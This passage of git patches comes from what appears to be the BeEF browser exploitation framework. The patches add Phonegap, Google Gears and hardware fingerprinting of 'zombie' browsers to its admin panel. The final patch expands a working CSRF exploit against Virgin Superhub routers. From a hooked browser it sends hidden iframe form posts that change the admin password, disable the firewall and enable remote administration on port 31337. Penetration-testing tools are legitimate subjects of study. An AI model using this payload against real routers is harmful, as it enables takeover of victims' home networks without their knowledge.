ylm@tStztFSA9JH|iQ%5I0kkbfDL9F6I2_-~w2Pr5p>PV~pm_q;wB(UQ{ zpq^wTM>b=Wa?dz6gj0_SZaUGx5dyiO&JZL#q1s3+L;*n)W0WzA1PuA(1Rvb~qe&J+ zbQsMeX*@K|LM~Wv$r@<5p@tk84)kuk{usd|FZ9qr#tK?uI0>&?g)bXi7bsgZq1~(|eLRUH+-Nq8rj8jQ7#ie1(9}UnG1dIex z1cDYfERewg1s^?z1!|OnF^&w4*b|N);_R>(f&NUQOaV6(kO8*+{1C+eZqVVy2z%I& z06MP}mr0!m=)<)Z*Yv}}B~{R2K_qSX?FHNsX;K^rTQ8uG2tD*r1;7KS(TG2qEM<@j vwJ^SbGZkCR3hXR>-p>K=6tKYpiu?e!@Cjv7mjMnSGYRw9hcCYH0RaFzI3Jfs literal 0 HcmV?d00001 diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js index 964e586a4..6f7d02f50 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js +++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js @@ -28,6 +28,8 @@ var ZombiesMgr = function(zombies_tree_lists) { var browser_icon = zombie_array[index]["browser_icon"]; var os_icon = zombie_array[index]["os_icon"]; var os_name = zombie_array[index]["os_name"]; + var hw_name = zombie_array[index]["hw_name"]; + var hw_icon = zombie_array[index]["hw_icon"]; var domain = zombie_array[index]["domain"]; var port = zombie_array[index]["port"]; var has_flash = zombie_array[index]["has_flash"]; @@ -36,11 +38,13 @@ var ZombiesMgr = function(zombies_tree_lists) { text = " "; text+= " "; + text+= " "; text+= ip; balloon_text = "IP: "+ip; balloon_text+= "
Browser: " + browser_name + " " + browser_version; balloon_text+= "
System: " + os_name; + balloon_text+= "
Hardware: " + hw_name; balloon_text+= "
Domain: " + domain + ":" + port; balloon_text+= "
Flash: " + has_flash; balloon_text+= "
Web Sockets: " + has_web_sockets; diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index a896184cb..4251347cd 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -358,6 +358,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the os name + hw_name = BD.get(self.targetsession, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? From d5acc6409eb73feff5ace32253d55147a4ff02df Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Jun 2012 11:04:19 +0930 Subject: [PATCH 16/17] Added beef.browser.hasPhonegap() Added hasPhonegap() and hasGooglegears() to balloon messages Updated os in module configs from "iPhone" to "iOS" --- core/main/client/browser.js | 15 ++++++ core/main/handlers/browserdetails.rb | 8 ++++ .../admin_ui/controllers/modules/modules.rb | 15 ++++++ .../admin_ui/controllers/panel/panel.rb | 26 +++++----- .../media/javascript/ui/panel/ZombiesMgr.js | 48 ++++++++++--------- extensions/console/lib/shellinterface.rb | 15 ++++++ .../mobilesafari_address_spoofing/config.yaml | 2 +- .../host/detect_google_desktop/config.yaml | 2 +- modules/host/get_system_info/config.yaml | 2 +- modules/host/hook_default_browser/config.yaml | 2 +- modules/host/iphone_tel/config.yaml | 2 +- 11 files changed, 99 insertions(+), 38 deletions(-) diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 9a243aad4..2e82f5de6 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -551,6 +551,19 @@ beef.browser = { }, + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasJava()) { ... } + */ + hasPhonegap: function() { + var result = false; + try { if (!!device.phonegap) result = true; else result = false; } + catch(e) { result = false; } + return result; + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. @@ -773,6 +786,7 @@ beef.browser = { var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; @@ -799,6 +813,7 @@ beef.browser = { if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash + if(has_phonegap) details['HasPhonegap'] = has_phonegap if(has_web_socket) details['HasWebSocket'] = has_web_socket if(has_googlegears) details['HasGoogleGears'] = has_googlegears if(has_activex) details['HasActiveX'] = has_activex; diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index 1ca83f165..9a5f27946 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -230,6 +230,14 @@ module BeEF self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection." end + # get and store the yes|no value for HasPhonegap + has_phonegap = get_param(@data['results'], 'HasPhonegap') + if BeEF::Filters.is_valid_yes_no?(has_phonegap) + BD.set(session_id, 'HasPhonegap', has_phonegap) + else + self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection." + end + # get and store the yes|no value for HasGoogleGears has_googlegears = get_param(@data['results'], 'HasGoogleGears') if BeEF::Filters.is_valid_yes_no?(has_googlegears) diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 827f6c241..6fce2a02c 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -346,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for hasPhonegap + has_phonegap = BD.get(zombie_session, 'hasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(zombie_session, 'HasGoogleGears') if not has_googlegears.nil? diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb index 56b6a708c..6c101681a 100644 --- a/extensions/admin_ui/controllers/panel/panel.rb +++ b/extensions/admin_ui/controllers/panel/panel.rb @@ -85,17 +85,19 @@ class Panel < BeEF::Extension::AdminUI::HttpController # create a hash of simple hooked browser details def get_simple_hooked_browser_hash(hooked_browser) - browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') - browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') - browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) - os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) - os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') - hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) - hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') - domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') - has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') - has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') - date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') + browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') + browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) + os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) + os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) + hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') + domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') + has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') + has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') + has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears') + has_phonegap = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasPhonegap') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') return { 'session' => hooked_browser.session, @@ -111,6 +113,8 @@ class Panel < BeEF::Extension::AdminUI::HttpController 'hw_name' => hw_name, 'has_flash' => has_flash, 'has_web_sockets' => has_web_sockets, + 'has_googlegears' => has_googlegears, + 'has_phonegap' => has_phonegap, 'date_stamp' => date_stamp } diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js index 6f7d02f50..e161c8209 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js +++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js @@ -21,34 +21,38 @@ var ZombiesMgr = function(zombies_tree_lists) { // this is a helper class to create a zombie object from a JSON hash index this.zombieFactory = function(index, zombie_array){ - var ip = zombie_array[index]["ip"]; - var session = zombie_array[index]["session"]; - var browser_name = zombie_array[index]["browser_name"]; - var browser_version = zombie_array[index]["browser_version"]; - var browser_icon = zombie_array[index]["browser_icon"]; - var os_icon = zombie_array[index]["os_icon"]; - var os_name = zombie_array[index]["os_name"]; - var hw_name = zombie_array[index]["hw_name"]; - var hw_icon = zombie_array[index]["hw_icon"]; - var domain = zombie_array[index]["domain"]; - var port = zombie_array[index]["port"]; - var has_flash = zombie_array[index]["has_flash"]; - var has_web_sockets = zombie_array[index]["has_web_sockets"]; - var date_stamp = zombie_array[index]["date_stamp"]; + var ip = zombie_array[index]["ip"]; + var session = zombie_array[index]["session"]; + var browser_name = zombie_array[index]["browser_name"]; + var browser_version = zombie_array[index]["browser_version"]; + var browser_icon = zombie_array[index]["browser_icon"]; + var os_icon = zombie_array[index]["os_icon"]; + var os_name = zombie_array[index]["os_name"]; + var hw_name = zombie_array[index]["hw_name"]; + var hw_icon = zombie_array[index]["hw_icon"]; + var domain = zombie_array[index]["domain"]; + var port = zombie_array[index]["port"]; + var has_flash = zombie_array[index]["has_flash"]; + var has_web_sockets = zombie_array[index]["has_web_sockets"]; + var has_googlegears = zombie_array[index]["has_googlegears"]; + var has_phonegap = zombie_array[index]["has_phonegap"]; + var date_stamp = zombie_array[index]["date_stamp"]; text = " "; text+= " "; text+= " "; text+= ip; - balloon_text = "IP: "+ip; - balloon_text+= "
Browser: " + browser_name + " " + browser_version; - balloon_text+= "
System: " + os_name; - balloon_text+= "
Hardware: " + hw_name; - balloon_text+= "
Domain: " + domain + ":" + port; - balloon_text+= "
Flash: " + has_flash; - balloon_text+= "
Web Sockets: " + has_web_sockets; - balloon_text+= "
Date: " + date_stamp; + balloon_text = "IP: " + ip; + balloon_text+= "
Browser: " + browser_name + " " + browser_version; + balloon_text+= "
System: " + os_name; + balloon_text+= "
Hardware: " + hw_name; + balloon_text+= "
Domain: " + domain + ":" + port; + balloon_text+= "
Flash: " + has_flash; + balloon_text+= "
Web Sockets: " + has_web_sockets; + balloon_text+= "
Google Gears: " + has_googlegears; + balloon_text+= "
Phonegap API: " + has_phonegap; + balloon_text+= "
Date: " + date_stamp; var new_zombie = { 'id' : index, diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index 4251347cd..f810c042e 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb @@ -550,6 +550,21 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for HasPhonegap + has_phonegap = BD.get(self.targetsession, 'HasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(self.targetsession, 'HasGoogleGears') if not has_googlegears.nil? diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index b4a20fe33..3aa49f32f 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml @@ -24,7 +24,7 @@ beef: target: working: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml index 4a0d23f18..ba611bf45 100644 --- a/modules/host/detect_google_desktop/config.yaml +++ b/modules/host/detect_google_desktop/config.yaml @@ -24,5 +24,5 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["ALL"] diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml index 802db1695..7902a2381 100644 --- a/modules/host/get_system_info/config.yaml +++ b/modules/host/get_system_info/config.yaml @@ -24,6 +24,6 @@ beef: target: not_working: ALL: - os: ["iPhone", "Macintosh"] + os: ["iOS", "Macintosh"] working: ["O", "FF", "S", "IE"] user_notify: ["C"] diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml index 0033717ba..56c276653 100644 --- a/modules/host/hook_default_browser/config.yaml +++ b/modules/host/hook_default_browser/config.yaml @@ -24,6 +24,6 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["All"] user_notify: ["FF", "C"] diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml index d3bb15769..783637ed4 100644 --- a/modules/host/iphone_tel/config.yaml +++ b/modules/host/iphone_tel/config.yaml @@ -24,7 +24,7 @@ beef: target: user_notify: S: - os: ["iPhone"] + os: ["iOS"] not_working: ALL: os: ["All"] From 123b81b2b47ce59c45d6e59e489b342b85a70a77 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Jun 2012 11:18:28 +0930 Subject: [PATCH 17/17] Updated virgin_superhub_csrf module Now disables firewall and enabled remote administration Fixes issue #705 Fixes issue #706 Fixes issue #707 --- .../router/virgin_superhub_csrf/command.js | 18 +++++++++++++++--- .../router/virgin_superhub_csrf/config.yaml | 2 +- .../router/virgin_superhub_csrf/module.rb | 3 ++- 3 files changed, 18 insertions(+), 5 deletions(-) diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index 3c84ee315..fb0ed4ca4 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js @@ -17,17 +17,29 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var port = '<%= @port %>'; - var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ - {'type':'hidden', 'name':'NetgearPassword', 'value':passwd} , + var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); + var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + ]); + + var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(virgin_superhub_iframe); + document.body.removeChild(virgin_superhub_iframe1); + document.body.removeChild(virgin_superhub_iframe2); + document.body.removeChild(virgin_superhub_iframe3); } setTimeout("cleanup()", 15000); diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml index 8d7a7a3c9..e767d9fef 100644 --- a/modules/exploits/router/virgin_superhub_csrf/config.yaml +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Exploits", "Router"] name: "Virgin Superhub CSRF" - description: "Attempts to change the admin password on a Virgin Superhub router." + description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router." authors: ["bcoles", "n0x00"] target: working: ["ALL"] diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb index 28684484d..83599490c 100644 --- a/modules/exploits/router/virgin_superhub_csrf/module.rb +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -18,7 +18,8 @@ class Virgin_superhub_csrf < BeEF::Core::Command def self.options return [ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'}, - {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}, + {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'} ] end